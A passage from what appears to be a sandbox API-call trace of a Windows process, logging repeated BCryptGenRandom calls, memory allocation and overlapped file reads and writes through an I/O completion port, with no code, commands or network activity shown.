pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.386] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.386] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.386] free (_Block=0x77d7a8) [0113.387] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.387] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.387] free (_Block=0x2071c20) [0113.387] free (_Block=0x2071d30) [0113.387] free (_Block=0x77d8b0) [0113.387] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.392] CloseHandle (hObject=0x81c) returned 1 [0113.393] free (_Block=0x1ff1e60) [0113.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.403] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.403] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.403] free (_Block=0x77d7a8) [0113.403] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.403] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.403] free (_Block=0x2071c20) [0113.403] free (_Block=0x2071d30) [0113.404] free (_Block=0x77d8b0) [0113.404] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.561] CloseHandle (hObject=0x13c0) returned 1 [0113.565] free (_Block=0x3db04c0) [0113.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.566] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.884] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2ee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.884] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.911] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.911] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.911] free (_Block=0x77d7a8) [0113.911] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.911] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.911] free (_Block=0x2071c20) [0113.911] free (_Block=0x2071d30) [0113.911] free (_Block=0x77d8b0) [0113.911] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0113.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.930] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.930] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.930] free (_Block=0x77d7a8) [0113.930] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.930] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.930] free (_Block=0x2071c20) [0113.930] free (_Block=0x2071d30) [0113.930] free (_Block=0x77d8b0) [0113.930] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.941] CloseHandle (hObject=0x3bc) returned 1 [0113.944] free (_Block=0x3e70008) [0113.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.952] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x920e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.976] CloseHandle (hObject=0x2f4) returned 1 [0113.977] free (_Block=0x1ff1e60) [0113.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0113.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0113.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0113.990] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.990] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.990] free (_Block=0x77d7a8) [0113.990] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.990] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.990] free (_Block=0x2071c20) [0113.990] free (_Block=0x2071d30) [0113.990] free (_Block=0x77d8b0) [0113.991] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0113.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.007] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4720, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.007] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0114.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0114.015] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.015] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.015] free (_Block=0x77d7a8) [0114.015] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.015] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.015] free (_Block=0x2071c20) [0114.015] free (_Block=0x2071d30) [0114.015] free (_Block=0x77d8b0) [0114.015] WriteFile (in: hFile=0x340, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.017] CloseHandle (hObject=0x81c) returned 1 [0114.018] free (_Block=0x3d70450) [0114.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.019] CloseHandle (hObject=0x2f4) returned 1 [0114.021] free (_Block=0x1ff1e60) [0114.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.068] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2168, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.073] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x20e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0114.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.084] CloseHandle (hObject=0x2f4) returned 1 [0114.088] free (_Block=0x3e70008) [0114.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.094] CloseHandle (hObject=0x81c) returned 1 [0114.100] free (_Block=0x3ef0008) [0114.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.108] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ec6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.121] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0114.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0114.136] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.136] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.136] free (_Block=0x77d7a8) [0114.136] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.136] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.136] free (_Block=0x2071c20) [0114.136] free (_Block=0x2071d30) [0114.136] free (_Block=0x77d8b0) [0114.136] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.148] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0114.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.149] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0114.153] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.153] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.153] free (_Block=0x77d7a8) [0114.153] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.153] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.154] free (_Block=0x2071c20) [0114.154] free (_Block=0x2071d30) [0114.154] free (_Block=0x77d8b0) [0114.154] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.160] CloseHandle (hObject=0x81c) returned 1 [0114.266] free (_Block=0x3e70008) [0114.266] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0114.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0114.292] calloc (_Count=0x40, _Size=0x4) returned 0x77d858 [0114.292] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.292] free (_Block=0x77d858) [0114.292] calloc (_Count=0x41, _Size=0x4) returned 0x77d858 [0114.292] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.293] free (_Block=0x77d858) [0114.293] free (_Block=0x2071d30) [0114.293] free (_Block=0x2071c20) [0114.293] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.394] CloseHandle (hObject=0x3bc) returned 1 [0114.395] free (_Block=0x3db04c0) [0114.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.415] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.425] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.435] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0114.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0114.436] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.436] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.437] free (_Block=0x77d7a8) [0114.437] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.437] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.437] free (_Block=0x2071c20) [0114.437] free (_Block=0x2071d30) [0114.437] free (_Block=0x77d8b0) [0114.437] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.462] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0114.463] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.483] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0114.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.493] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0114.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, 